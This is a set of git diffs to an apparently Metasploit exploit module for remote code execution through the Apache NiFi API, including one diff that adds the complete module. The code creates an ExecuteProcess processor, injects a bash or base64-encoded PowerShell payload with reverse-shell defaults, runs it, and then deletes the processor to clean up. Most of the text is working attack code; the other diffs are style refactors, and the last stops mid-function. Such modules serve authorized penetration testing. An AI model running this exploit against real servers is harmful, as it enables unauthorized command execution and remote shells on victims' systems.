     opts['headers'] = { 'Authorization' => "Bearer #{token}" } if token
     response = send_request_cgi(opts)
-    process_group = check_response(
-      'GETting root process group', response, 200, 'id'
-    )
+    process_group = check_response('GETting root process group', response, 200, 'id')
     process_group
   end
 
   def create_processor(process_group, token)
-    body = {
-      'component' => {
-        'type' => 'org.apache.nifi.processors.standard.ExecuteProcess'
-      },
-      'revision' => {
-        'version' => 0
-      }
-    }
-    opts = {
-      'method' => 'POST',
-      'uri' => normalize_uri(
-        target_uri.path, 'process-groups', process_group, 'processors'
-      ),
-      'ctype' => 'application/json',
-      'data' => body.to_json
-    }
+    body = { 'component' => { 'type' => 'org.apache.nifi.processors.standard.ExecuteProcess' },
+             'revision' => { 'version' => 0 } }
+    opts = { 'method' => 'POST',
+             'uri' => normalize_uri(target_uri.path, 'process-groups', process_group, 'processors'),
+             'ctype' => 'application/json',
+             'data' => body.to_json }
     opts['headers'] = { 'Authorization' => "Bearer #{token}" } if token
     response = send_request_cgi(opts)
-    processor = check_response(
-      "POSTing new processor in process group #{process_group}",
-      response, 201, 'id'
-    )
+    processor = check_response("POSTing new processor in process group #{process_group}", response, 201, 'id')
     processor
   end
 
   def configure_processor(processor, command, token)
     cmd = command.split(' ', 2)
-    body = {
-      'component' => {
-        'config' => {
-          'autoTerminatedRelationships' => [
-            'success'
-          ],
-          'properties' => {
-            'Command' => cmd[0],
-            'Command Arguments' => cmd[1]
-          },
-          'schedulingPeriod' => '3600 sec'
-        },
-        'id' => processor,
-        'state' => 'RUNNING'
+    body = { 'component' => {
+      'config' => {
+        'autoTerminatedRelationships' => ['success'],
+        'properties' => { 'Command' => cmd[0], 'Command Arguments' => cmd[1] },
+        'schedulingPeriod' => '3600 sec'
       },
-      'revision' => {
-        'clientId' => 'x',
-        'version' => 1
-      }
-    }
+      'id' => processor,
+      'state' => 'RUNNING'
+    },
+             'revision' => { 'clientId' => 'x', 'version' => 1 } }
     opts = {
       'method' => 'PUT',
       'uri' => normalize_uri(target_uri.path, 'processors', processor),
@@ -192,56 +148,34 @@ class MetasploitModule < Msf::Exploit::Remote
     }
     opts['headers'] = { 'Authorization' => "Bearer #{token}" } if token
     response = send_request_cgi(opts)
-    check_response(
-      "PUTting processor #{processor} configuration", response, 200
-    )
+    check_response("PUTting processor #{processor} configuration", response, 200)
   end
 
   def stop_processor(processor, token)
     # Attempt to stop process
-    body = {
-      'revision' => {
-        'clientId' => 'x',
-        'version' => 1
-      },
-      'state' => 'STOPPED'
-    }
+    body = { 'revision' => { 'clientId' => 'x', 'version' => 1 }, 'state' => 'STOPPED' }
     opts = {
       'method' => 'PUT',
-      'uri' => normalize_uri(
-        target_uri.path, 'processors', processor, 'run-status'
-      ),
+      'uri' => normalize_uri(target_uri.path, 'processors', processor, 'run-status'),
       'ctype' => 'application/json',
       'data' => body.to_json
     }
     opts['headers'] = { 'Authorization' => "Bearer #{token}" } if token
     response = send_request_cgi(opts)
-    check_response(
-      "PUTting processor #{processor} stop command", response, 200
-    )
+    check_response("PUTting processor #{processor} stop command", response, 200)
 
     # Stop may not have worked (but must be done first). Terminate threads now
-    opts = {
-      'method' => 'DELETE',
-      'uri' => normalize_uri(
-        target_uri.path, 'processors', processor, 'threads'
-      )
-    }
+    opts = { 'method' => 'DELETE', 'uri' => normalize_uri(target_uri.path, 'processors', processor, 'threads') }
     opts['headers'] = { 'Authorization' => "Bearer #{token}" } if token
     response = send_request_cgi(opts)
-    check_response(
-      "DELETEing processor #{processor} terminate threads command",
-      response, 200
-    )
+    check_response("DELETEing processor #{processor} terminate threads command", response, 200)
   end
 
   def delete_processor(processor, token)
     opts = {
       'method' => 'DELETE',
       'uri' => normalize_uri(target_uri.path, 'processors', processor),
-      'vars_get' => {
-        'version' => 3
-      }
+      'vars_get' => { 'version' => 3 }
     }
     opts['headers'] = { 'Authorization' => "Bearer #{token}" } if token
     response = send_request_cgi(opts)
@@ -249,25 +183,16 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
-    # As far as I can tell from the API documentation, it's not possible to
-    # check whether the required premissions are present unless permissions to
-    # the permissions permissions are present. For this reason it reports:
-    # * "Unknown" if a timeout is experienced when checking whether login is
-    #   required
-    # * "Safe" if the response to the login check is not one of the two
-    #   expected responses because it's probably not NiFi
-    # * "Detected" if login is required, because it has confirmed that NiFi is
-    #   running on the port becuase it got an expected response
-    # * "Appears" if login is not required because it has confirmed that Nifi
-    #   is running because it got the expected response and if there is no
-    #   authentication then there is no way of restricting the ExecuteCode
-    #   permimssion
-    response = send_request_cgi(
-      { 'method' => 'GET',
-        'uri' => normalize_uri(
-          target_uri.path, 'access', 'config'
-        ) }
-    )
+    # As far as I can tell from the API documentation, it's not possible to check whether the required premissions are
+    # present unless permissions to the permissions permissions are present. For this reason it reports:
+    # * "Unknown" if a timeout is experienced when checking whether login is required
+    # * "Safe" if the response to the login check is not one of the two expected responses because it's probably not
+    #      NiFi
+    # * "Detected" if login is required, because it has confirmed that NiFi is running on the port becuase it got an
+    #      expected response
+    # * "Appears" if login is not required because it has confirmed that Nifi is running because it got the expected
+    #      response and if there is no authentication then there is no way of restricting the ExecuteCode permimssion
+    response = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'access', 'config') })
     if !response
       CheckCode::Unknown
     else
@@ -283,24 +208,17 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def validate_config
-    if !datastore['BEARER-TOKEN'].to_s.empty? &&
-       !datastore['USERNAME'].to_s.empty?
-      fail_with(Failure::BadConfig,
-                'Specify EITHER Bearer-Token OR Username')
-    end
+    return unless !datastore['BEARER-TOKEN'].to_s.empty? && !datastore['USERNAME'].to_s.empty?
+
+    fail_with(Failure::BadConfig, 'Specify EITHER Bearer-Token OR Username')
   end
 
   def retrieve_token
-    response = send_request_cgi(
-      { 'method' => 'POST',
-        'uri' => normalize_uri(
-          target_uri.path, 'access', 'token'
-        ),
-        'vars_post' => {
-          'username' => datastore['USERNAME'],
-          'password' => datastore['PASSWORD']
-        } }
-    )
+    response = send_request_cgi({
+                                  'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'access', 'token'),
+                                  'vars_post' => { 'username' => datastore['USERNAME'],
+                                                   'password' => datastore['PASSWORD'] }
+                                })
     check_response('POSTing credentials', response, 201)
     token = response.body
     token
@@ -311,11 +229,9 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # Check whether login is required and set/fetch token
     if supports_login
-      if datastore['BEARER-TOKEN'].to_s.empty? &&
-         datastore['USERNAME'].to_s.empty?
+      if datastore['BEARER-TOKEN'].to_s.empty? && datastore['USERNAME'].to_s.empty?
         fail_with(Failure::BadConfig,
-                  'Authentication is required. Bearer-Token or ' \
-                  'Username and Password must be specified')
+                  'Authentication is required. Bearer-Token or Username and Password must be specified')
       end
       token = if !datastore['BEARER-TOKEN'].to_s.empty?
                 datastore['BEARER-TOKEN']
@@ -330,22 +246,18 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # Create processor in root process group
     processor = create_processor(process_group, token)
-    vprint_good(
-      "Created processor #{processor} in process group #{process_group}"
-    )
+    vprint_good("Created processor #{processor} in process group #{process_group}")
 
     # Generate command
     case target['Type']
     when :unix_memory
       cmd = "bash -c \"#{payload.encoded}\""
     when :win_memory
-      # This is a bit hacky because double quotes are processed and removed by
-      # the NiFi ExecuteCommand processor. See below for why BadChars didn't
-      # cut it. The solution used is to wrap up command in a cmd /C "payload"
-      # command and use powershell's Stop-parsing token (--%) to remove the
-      # need to perform any escaping of metacharacter. This command is then
-      # base64 encoded and run with -e/-EncodedCommand. This allows commands
-      # including double quotes and dollar signs (etc.) to be passed to cmd.exe
+      # This is a bit hacky because double quotes are processed and removed by the NiFi ExecuteCommand processor. See
+      # below for why BadChars didn't cut it. The solution used is to wrap up command in a cmd /C "payload" command and
+      # use powershell's Stop-parsing token (--%) to remove the need to perform any escaping of metacharacter. This
+      # command is then base64 encoded and run with -e/-EncodedCommand. This allows commands including double quotes and
+      #  dollar signs (etc.) to be passed to cmd.exe
       #
       # This method was chosen rather than using
       #   BadChars => '"'
@@ -354,9 +266,7 @@ class MetasploitModule < Msf::Exploit::Remote
       # because commands such as
       #   echo x^"x >%tmp%\x
       # did not work with the BadChars method ("^" is the cmd.exe escape char)
-      enc_cmd = Base64.strict_encode64(
-        "cmd /C --% #{payload.encoded}".encode('UTF-16LE')
-      )
+      enc_cmd = Base64.strict_encode64("cmd /C --% #{payload.encoded}".encode('UTF-16LE'))
       cmd = "powershell.exe -e #{enc_cmd}"
     end
     vprint_status("Using command #{cmd}")
@@ -367,9 +277,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # Wait for thread to execute - This seems necesarry, especially on Windows
     # and there is no way I can see of checking whether the thread has executed
-    print_status(
-      "Waiting #{datastore['DELAY']} seconds before stopping and deleting"
-    )
+    print_status("Waiting #{datastore['DELAY']} seconds before stopping and deleting")
     sleep(datastore['DELAY'])
 
     # Stop Processor

--- a/modules/exploits/multi/http/apache_nifi_processor_rce.rb
+++ b/modules/exploits/multi/http/apache_nifi_processor_rce.rb
@@ -237,10 +237,6 @@ class MetasploitModule < Msf::Exploit::Remote
 
     validate_config
 
-    checked = check
-    unless (checked == CheckCode::Appears) || (checked == CheckCode::Detected)
-      fail_with(Failure::UnexpectedReply, 'Apache NiFi not detected')
-    end
 
     # Check whether login is required and set/fetch token
     if supports_login

--- a/modules/exploits/multi/http/apache_nifi_processor_rce.rb
+++ b/modules/exploits/multi/http/apache_nifi_processor_rce.rb
@@ -101,8 +101,7 @@ class MetasploitModule < Msf::Exploit::Remote
     opts = { 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'process-groups', 'root') }
     opts['headers'] = { 'Authorization' => "Bearer #{@token}" } if @token
     response = send_request_cgi(opts)
-    process_group = check_response('GETting root process group', response, 200, 'id')
-    process_group
+    check_response('GETting root process group', response, 200, 'id')
   end
 
   def create_processor(process_group)

--- a/modules/exploits/multi/http/apache_nifi_processor_rce.rb
+++ b/modules/exploits/multi/http/apache_nifi_processor_rce.rb
@@ -1,0 +1,391 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+# Potential Improvements:
+# Add option to authenticate using client certificate
+# Add a documentation (markdown?)
+# Add a scanner module?
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(
+      info,
+      'Name' => 'Apache NiFi API Remote Code Execution',
+      'Description' => '
+        This module uses the NiFi API to create an ExecuteProcess processor
+        that will execute OS commands. The API must be unsecured (or
+        credentials provided) and the ExecuteProcess processor must be
+        available. An ExecuteProcessor processor is created then is
+        configured with the payload and started. The processor is then
+        stopped and deleted.
+      ',
+      'License' => MSF_LICENSE,
+      'Author' => ['Graeme Robinson'],
+      'References' => [
+        ['URL', 'https://nifi.apache.org/']
+      ],
+      'DisclosureDate' => 'Oct 3 2020',
+      'DefaultOptions' => {
+        'RPORT' => 8080
+      },
+      'Platform' => %w[unix linux macos win],
+      'Arch' => [ARCH_X86, ARCH_X64],
+      'Targets' => [
+        [
+          'Unix (In-Memory)',
+          'Platform' => 'unix',
+          'Arch' => ARCH_CMD,
+          'Type' => :unix_memory,
+          'Payload' => {
+            'BadChars' => '"'
+          },
+          'DefaultOptions' => {
+            'PAYLOAD' => 'cmd/unix/reverse_bash'
+          }
+        ],
+        [
+          'Windows (In-Memory)',
+          'Platform' => 'win',
+          'Arch' => ARCH_CMD,
+          'Type' => :win_memory,
+          'DefaultOptions' => {
+            'PAYLOAD' => 'cmd/windows/reverse_powershell'
+          }
+        ]
+      ],
+      'Privileged' => false,
+      'DefaultTarget' => 0,
+      'Notes' => {
+        'Stability' => [CRASH_SAFE],
+        'Reliability' => [REPEATABLE_SESSION],
+        'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES]
+      }
+    ))
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The base path', '/nifi-api']),
+        OptString.new('USERNAME', [false, 'Username to authenticate with']),
+        OptString.new('PASSWORD', [false, 'Password to authenticate with']),
+        OptString.new('BEARER-TOKEN', [false, 'JWT authenticate with']),
+        OptInt.new(
+          'DELAY', [
+            true,
+            'The delay (s) before stopping and deleting the processor',
+            5 # 2 seems enough in my lab, but set to 5 for safety
+          ]
+        )
+      ],
+      self.class
+    )
+  end
+
+  def check_response(description, response, expected_response_code, item = '')
+    # Check that response was received
+    if !response
+      fail_with(
+        Failure::Unreachable,
+        "Unable to retrieve HTTP response from API when #{description}"
+      )
+    # Check that response code was expected
+    elsif response.code != expected_response_code
+      fail_with(
+        Failure::UnexpectedReply,
+        "Unexpected HTTP response code from API when #{description} " \
+        "(received #{response.code}, expected #{expected_response_code})"
+      )
+    end
+    # Check that item can be retrieved
+    return if item.empty?
+
+    body = response.get_json_document
+    unless body.key?(item)
+      fail_with(
+        Failure::UnexpectedReply,
+        "Unable to retrieve #{item} from HTTP response when " \
+        "#{description}"
+      )
+    end
+    body[item]
+  end
+
+  def supports_login
+    response = send_request_cgi(
+      { 'method' => 'GET',
+        'uri' => normalize_uri(
+          target_uri.path, 'access', 'config'
+        ) }
+    )
+    config = check_response(
+      'GETting access configuration', response, 200, 'config'
+    )
+    config['supportsLogin']
+  end
+
+  def get_process_group(token)
+    opts = {
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'process-groups', 'root')
+    }
+    opts['headers'] = { 'Authorization' => "Bearer #{token}" } if token
+    response = send_request_cgi(opts)
+    process_group = check_response(
+      'GETting root process group', response, 200, 'id'
+    )
+    process_group
+  end
+
+  def create_processor(process_group, token)
+    body = {
+      'component' => {
+        'type' => 'org.apache.nifi.processors.standard.ExecuteProcess'
+      },
+      'revision' => {
+        'version' => 0
+      }
+    }
+    opts = {
+      'method' => 'POST',
+      'uri' => normalize_uri(
+        target_uri.path, 'process-groups', process_group, 'processors'
+      ),
+      'ctype' => 'application/json',
+      'data' => body.to_json
+    }
+    opts['headers'] = { 'Authorization' => "Bearer #{token}" } if token
+    response = send_request_cgi(opts)
+    processor = check_response(
+      "POSTing new processor in process group #{process_group}",
+      response, 201, 'id'
+    )
+    processor
+  end
+
+  def configure_processor(processor, command, token)
+    cmd = command.split(' ', 2)
+    body = {
+      'component' => {
+        'config' => {
+          'autoTerminatedRelationships' => [
+            'success'
+          ],
+          'properties' => {
+            'Command' => cmd[0],
+            'Command Arguments' => cmd[1]
+          },
+          'schedulingPeriod' => '3600 sec'
+        },
+        'id' => processor,
+        'state' => 'RUNNING'
+      },
+      'revision' => {
+        'clientId' => 'x',
+        'version' => 1
+      }
+    }
+    opts = {
+      'method' => 'PUT',
+      'uri' => normalize_uri(target_uri.path, 'processors', processor),
+      'ctype' => 'application/json',
+      'data' => body.to_json
+    }
+    opts['headers'] = { 'Authorization' => "Bearer #{token}" } if token
+    response = send_request_cgi(opts)
+    check_response(
+      "PUTting processor #{processor} configuration", response, 200
+    )
+  end
+
+  def stop_processor(processor, token)
+    # Attempt to stop process
+    body = {
+      'revision' => {
+        'clientId' => 'x',
+        'version' => 1
+      },
+      'state' => 'STOPPED'
+    }
+    opts = {
+      'method' => 'PUT',
+      'uri' => normalize_uri(
+        target_uri.path, 'processors', processor, 'run-status'
+      ),
+      'ctype' => 'application/json',
+      'data' => body.to_json
+    }
+    opts['headers'] = { 'Authorization' => "Bearer #{token}" } if token
+    response = send_request_cgi(opts)
+    check_response(
+      "PUTting processor #{processor} stop command", response, 200
+    )
+
+    # Stop may not have worked (but must be done first). Terminate threads now
+    opts = {
+      'method' => 'DELETE',
+      'uri' => normalize_uri(
+        target_uri.path, 'processors', processor, 'threads'
+      )
+    }
+    opts['headers'] = { 'Authorization' => "Bearer #{token}" } if token
+    response = send_request_cgi(opts)
+    check_response(
+      "DELETEing processor #{processor} terminate threads command",
+      response, 200
+    )
+  end
+
+  def delete_processor(processor, token)
+    opts = {
+      'method' => 'DELETE',
+      'uri' => normalize_uri(target_uri.path, 'processors', processor),
+      'vars_get' => {
+        'version' => 3
+      }
+    }
+    opts['headers'] = { 'Authorization' => "Bearer #{token}" } if token
+    response = send_request_cgi(opts)
+    check_response("DELETEting processor #{processor}", response, 200)
+  end
+
+  def check
+    # As far as I can tell from the API documentation, it's not possible to
+    # check whether the required premissions are present unless permissions to
+    # the permissions permissions are present. For this reason it reports:
+    # * "Unknown" if a timeout is experienced when checking whether login is
+    #   required
+    # * "Safe" if the response to the login check is not one of the two
+    #   expected responses because it's probably not NiFi
+    # * "Detected" if login is required, because it has confirmed that NiFi is
+    #   running on the port becuase it got an expected response
+    # * "Appears" if login is not required because it has confirmed that Nifi
+    #   is running because it got the expected response and if there is no
+    #   authentication then there is no way of restricting the ExecuteCode
+    #   permimssion
+    response = send_request_cgi(
+      { 'method' => 'GET',
+        'uri' => normalize_uri(
+          target_uri.path, 'access', 'config'
+        ) }
+    )
+    if !response
+      CheckCode::Unknown
+    else
+      body = response.get_json_document
+      if !body.key?('config')
+        CheckCode::Safe
+      elsif body['config']['supportsLogin']
+        CheckCode::Detected
+      else
+        CheckCode::Appears
+      end
+    end
+  end
+
+  def validate_config
+    if !datastore['BEARER-TOKEN'].to_s.empty? &&
+       !datastore['USERNAME'].to_s.empty?
+      fail_with(
+        Failure::BadConfig,
+        'Specify EITHER Bearer-Token OR Username'
+      )
+    end
+  end
+
+  def retrieve_token
+    response = send_request_cgi(
+      { 'method' => 'POST',
+        'uri' => normalize_uri(
+          target_uri.path, 'access', 'token'
+        ),
+        'vars_post' => {
+          'username' => datastore['USERNAME'],
+          'password' => datastore['PASSWORD']
+        } }
+    )
+    check_response('POSTing credentials', response, 201)
+    token = response.body
+    token
+  end
+
+  def exploit
+    validate_config
+
+    # Check whether login is required and set/fetch token
+    if supports_login
+      if datastore['BEARER-TOKEN'].to_s.empty? &&
+         datastore['USERNAME'].to_s.empty?
+        fail_with(
+          Failure::BadConfig,
+          'Authentication is required. Bearer-Token or ' \
+          'Username and Password must be specified'
+        )
+      end
+      token = if !datastore['BEARER-TOKEN'].to_s.empty?
+                datastore['BEARER-TOKEN']
+              else
+                retrieve_token
+              end
+    end
+
+    # Retrieve root process group
+    process_group = get_process_group(token)
+    vprint_good("Retrieved process group: #{process_group}")
+
+    # Create processor in root process group
+    processor = create_processor(process_group, token)
+    vprint_good(
+      "Created processor #{processor} in process group #{process_group}"
+    )
+
+    # Generate command
+    case target['Type']
+    when :unix_memory
+      cmd = "bash -c \"#{payload.encoded}\""
+    when :win_memory
+      # This is a bit hacky because double quotes are processed and removed by
+      # the NiFi ExecuteCommand processor. See below for why BadChars didn't
+      # cut it. The solution used is to wrap up command in a cmd /C "payload"
+      # command and use powershell's Stop-parsing token (--%) to remove the
+      # need to perform any escaping of metacharacter. This command is then
+      # base64 encoded and run with -e/-EncodedCommand. This allows commands
+      # including double quotes and dollar signs (etc.) to be passed to cmd.exe
+      #
+      # This method was chosen rather than using
+      #   BadChars => '"'
+      # with
+      #   cmd /C "#{payload.encoded}"
+      # because commands such as
+      #   echo x^"x >%tmp%\x
+      # did not work with the BadChars method ("^" is the cmd.exe escape char)
+      enc_cmd = Base64.strict_encode64(
+        "cmd /C --% #{payload.encoded}".encode('UTF-16LE')
+      )
+      cmd = "powershell.exe -e #{enc_cmd}"
+    end
+    vprint_status("Using command #{cmd}")
+
+    # Configure processor and run command
+    configure_processor(processor, cmd, token)
+    vprint_good("Configured processor #{processor} and ran command")
+
+    # Wait for thread to execute - This seems necesarry, especially on Windows
+    # and there is no way I can see of checking whether the thread has executed
+    print_status(
+      "Waiting #{datastore['DELAY']} seconds before stopping and deleting"
+    )
+    sleep(datastore['DELAY'])
+
+    # Stop Processor
+    stop_processor(processor, token)
+    vprint_good("Stopped and terminated processor #{processor}")
+
+    # Delete processor
+    delete_processor(processor, token)
+    vprint_good("Deleted processor #{processor}")
+  end
+end

--- a/modules/exploits/multi/http/apache_nifi_processor_rce.rb
+++ b/modules/exploits/multi/http/apache_nifi_processor_rce.rb
@@ -88,28 +88,24 @@ class MetasploitModule < Msf::Exploit::Remote
   def check_response(description, response, expected_response_code, item = '')
     # Check that response was received
     if !response
-      fail_with(
-        Failure::Unreachable,
-        "Unable to retrieve HTTP response from API when #{description}"
-      )
+      fail_with(Failure::Unreachable,
+                'Unable to retrieve HTTP response from' \
+                " API when #{description}")
     # Check that response code was expected
     elsif response.code != expected_response_code
-      fail_with(
-        Failure::UnexpectedReply,
-        "Unexpected HTTP response code from API when #{description} " \
-        "(received #{response.code}, expected #{expected_response_code})"
-      )
+      fail_with(Failure::UnexpectedReply,
+                'Unexpected HTTP response code from API when ' \
+                "#{description} (received #{response.code}, " \
+                "expected #{expected_response_code})")
     end
     # Check that item can be retrieved
     return if item.empty?
 
     body = response.get_json_document
     unless body.key?(item)
-      fail_with(
-        Failure::UnexpectedReply,
-        "Unable to retrieve #{item} from HTTP response when " \
-        "#{description}"
-      )
+      fail_with(Failure::UnexpectedReply,
+                "Unable to retrieve #{item} from HTTP" \
+                " response when #{description}")
     end
     body[item]
   end
@@ -289,10 +285,8 @@ class MetasploitModule < Msf::Exploit::Remote
   def validate_config
     if !datastore['BEARER-TOKEN'].to_s.empty? &&
        !datastore['USERNAME'].to_s.empty?
-      fail_with(
-        Failure::BadConfig,
-        'Specify EITHER Bearer-Token OR Username'
-      )
+      fail_with(Failure::BadConfig,
+                'Specify EITHER Bearer-Token OR Username')
     end
   end
 
@@ -319,11 +313,9 @@ class MetasploitModule < Msf::Exploit::Remote
     if supports_login
       if datastore['BEARER-TOKEN'].to_s.empty? &&
          datastore['USERNAME'].to_s.empty?
-        fail_with(
-          Failure::BadConfig,
-          'Authentication is required. Bearer-Token or ' \
-          'Username and Password must be specified'
-        )
+        fail_with(Failure::BadConfig,
+                  'Authentication is required. Bearer-Token or ' \
+                  'Username and Password must be specified')
       end
       token = if !datastore['BEARER-TOKEN'].to_s.empty?
                 datastore['BEARER-TOKEN']

--- a/modules/exploits/multi/http/apache_nifi_processor_rce.rb
+++ b/modules/exploits/multi/http/apache_nifi_processor_rce.rb
@@ -199,7 +199,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def validate_config
-    return unless !datastore['BEARER-TOKEN'].to_s.empty? && !datastore['USERNAME'].to_s.empty?
+    return if datastore['BEARER-TOKEN'].to_s.empty? || datastore['USERNAME'].to_s.empty?
 
     fail_with(Failure::BadConfig, 'Specify EITHER Bearer-Token OR Username')
   end

--- a/modules/exploits/multi/http/apache_nifi_processor_rce.rb
+++ b/modules/exploits/multi/http/apache_nifi_processor_rce.rb
@@ -10,6 +10,7 @@
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
+  prepend Msf::Exploit::Remote::AutoCheck
   include Msf::Exploit::Remote::HttpClient
 
   def initialize(info = {})
@@ -118,16 +119,18 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def configure_processor(command)
     cmd = command.split(' ', 2)
-    body = { 'component' => {
-      'config' => {
-        'autoTerminatedRelationships' => ['success'],
-        'properties' => { 'Command' => cmd[0], 'Command Arguments' => cmd[1] },
-        'schedulingPeriod' => '3600 sec'
+    body = {
+      'component' => {
+        'config' => {
+          'autoTerminatedRelationships' => ['success'],
+          'properties' => { 'Command' => cmd[0], 'Command Arguments' => cmd[1] },
+          'schedulingPeriod' => '3600 sec'
+        },
+        'id' => @processor,
+        'state' => 'RUNNING'
       },
-      'id' => @processor,
-      'state' => 'RUNNING'
-    },
-             'revision' => { 'clientId' => 'x', 'version' => 1 } }
+      'revision' => { 'clientId' => 'x', 'version' => 1 }
+    }
     opts = {
       'method' => 'PUT',
       'uri' => normalize_uri(target_uri.path, 'processors', @processor),
@@ -171,8 +174,8 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
-    # As far as I can tell from the API documentation, it's not possible to check whether the required premissions are
-    # present unless permissions to the permissions permissions are present. For this reason it reports:
+    # As far as I can tell from the API documentation, it's not possible to check whether the required permissions are
+    # present unless "permission to check permissions" is granted. For this reason it reports:
     # * "Unknown" if a timeout is experienced when checking whether login is required
     # * "Safe" if the response to the login check is not one of the two expected responses because it's probably not
     #      NiFi
@@ -233,10 +236,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    @cleanup_required = false
-
     validate_config
-
 
     # Check whether login is required and set/fetch token
     if supports_login

--- a/modules/exploits/multi/http/apache_nifi_processor_rce.rb
+++ b/modules/exploits/multi/http/apache_nifi_processor_rce.rb
@@ -87,7 +87,6 @@ class MetasploitModule < Msf::Exploit::Remote
     end
     if response.code != expected_response_code
       fail_with(Failure::UnexpectedReply,
-                # Do I need this line escape?
                 "Unexpected HTTP response code from API when #{description} " \
                 "(received #{response.code}, expected #{expected_response_code})")
     end

--- a/modules/exploits/multi/http/apache_nifi_processor_rce.rb
+++ b/modules/exploits/multi/http/apache_nifi_processor_rce.rb
@@ -26,12 +26,13 @@ class MetasploitModule < Msf::Exploit::Remote
       'License' => MSF_LICENSE,
       'Author' => ['Graeme Robinson'],
       'References' => [
-        ['URL', 'https://nifi.apache.org/']
+        ['URL', 'https://nifi.apache.org/'],
+        ['URL', 'https://github.com/apache/nifi'],
+        ['URL', 'https://nifi.apache.org/docs/nifi-docs/components/org.apache.nifi/nifi-standard-nar/1.12.1/' \
+                'org.apache.nifi.processors.standard.ExecuteProcess/index.html']
       ],
       'DisclosureDate' => 'Oct 3 2020',
-      'DefaultOptions' => {
-        'RPORT' => 8080
-      },
+      'DefaultOptions' => { 'RPORT' => 8080 },
       'Platform' => %w[unix linux macos win],
       'Arch' => [ARCH_X86, ARCH_X64],
       'Targets' => [
@@ -40,21 +41,15 @@ class MetasploitModule < Msf::Exploit::Remote
           'Platform' => 'unix',
           'Arch' => ARCH_CMD,
           'Type' => :unix_memory,
-          'Payload' => {
-            'BadChars' => '"'
-          },
-          'DefaultOptions' => {
-            'PAYLOAD' => 'cmd/unix/reverse_bash'
-          }
+          'Payload' => { 'BadChars' => '"' },
+          'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' }
         ],
         [
           'Windows (In-Memory)',
           'Platform' => 'win',
           'Arch' => ARCH_CMD,
           'Type' => :win_memory,
-          'DefaultOptions' => {
-            'PAYLOAD' => 'cmd/windows/reverse_powershell'
-          }
+          'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/reverse_powershell' }
         ]
       ],
       'Privileged' => false,
@@ -81,10 +76,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def check_response(description, response, expected_response_code, item = '')
     # Check that response was received
-    unless response
-      fail_with(Failure::Unreachable, "Unable to retrieve HTTP response from API when #{description}")
-      # Check that response code was expected
-    end
+    fail_with(Failure::Unreachable, "Unable to retrieve HTTP response from API when #{description}") unless response
+    # Check that response code was expected
     if response.code != expected_response_code
       fail_with(Failure::UnexpectedReply,
                 "Unexpected HTTP response code from API when #{description} " \
@@ -106,28 +99,28 @@ class MetasploitModule < Msf::Exploit::Remote
     config['supportsLogin']
   end
 
-  def get_process_group(token)
+  def fetch_process_group
     opts = { 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'process-groups', 'root') }
-    opts['headers'] = { 'Authorization' => "Bearer #{token}" } if token
+    opts['headers'] = { 'Authorization' => "Bearer #{@token}" } if @token
     response = send_request_cgi(opts)
     process_group = check_response('GETting root process group', response, 200, 'id')
     process_group
   end
 
-  def create_processor(process_group, token)
+  def create_processor(process_group)
     body = { 'component' => { 'type' => 'org.apache.nifi.processors.standard.ExecuteProcess' },
              'revision' => { 'version' => 0 } }
     opts = { 'method' => 'POST',
              'uri' => normalize_uri(target_uri.path, 'process-groups', process_group, 'processors'),
              'ctype' => 'application/json',
              'data' => body.to_json }
-    opts['headers'] = { 'Authorization' => "Bearer #{token}" } if token
+    opts['headers'] = { 'Authorization' => "Bearer #{@token}" } if @token
     response = send_request_cgi(opts)
     processor = check_response("POSTing new processor in process group #{process_group}", response, 201, 'id')
     processor
   end
 
-  def configure_processor(processor, command, token)
+  def configure_processor(command)
     cmd = command.split(' ', 2)
     body = { 'component' => {
       'config' => {
@@ -135,50 +128,50 @@ class MetasploitModule < Msf::Exploit::Remote
         'properties' => { 'Command' => cmd[0], 'Command Arguments' => cmd[1] },
         'schedulingPeriod' => '3600 sec'
       },
-      'id' => processor,
+      'id' => @processor,
       'state' => 'RUNNING'
     },
              'revision' => { 'clientId' => 'x', 'version' => 1 } }
     opts = {
       'method' => 'PUT',
-      'uri' => normalize_uri(target_uri.path, 'processors', processor),
+      'uri' => normalize_uri(target_uri.path, 'processors', @processor),
       'ctype' => 'application/json',
       'data' => body.to_json
     }
-    opts['headers'] = { 'Authorization' => "Bearer #{token}" } if token
+    opts['headers'] = { 'Authorization' => "Bearer #{@token}" } if @token
     response = send_request_cgi(opts)
-    check_response("PUTting processor #{processor} configuration", response, 200)
+    check_response("PUTting processor #{@processor} configuration", response, 200)
   end
 
-  def stop_processor(processor, token)
+  def stop_processor
     # Attempt to stop process
     body = { 'revision' => { 'clientId' => 'x', 'version' => 1 }, 'state' => 'STOPPED' }
     opts = {
       'method' => 'PUT',
-      'uri' => normalize_uri(target_uri.path, 'processors', processor, 'run-status'),
+      'uri' => normalize_uri(target_uri.path, 'processors', @processor, 'run-status'),
       'ctype' => 'application/json',
       'data' => body.to_json
     }
-    opts['headers'] = { 'Authorization' => "Bearer #{token}" } if token
+    opts['headers'] = { 'Authorization' => "Bearer #{@token}" } if @token
     response = send_request_cgi(opts)
-    check_response("PUTting processor #{processor} stop command", response, 200)
+    check_response("PUTting processor #{@processor} stop command", response, 200)
 
     # Stop may not have worked (but must be done first). Terminate threads now
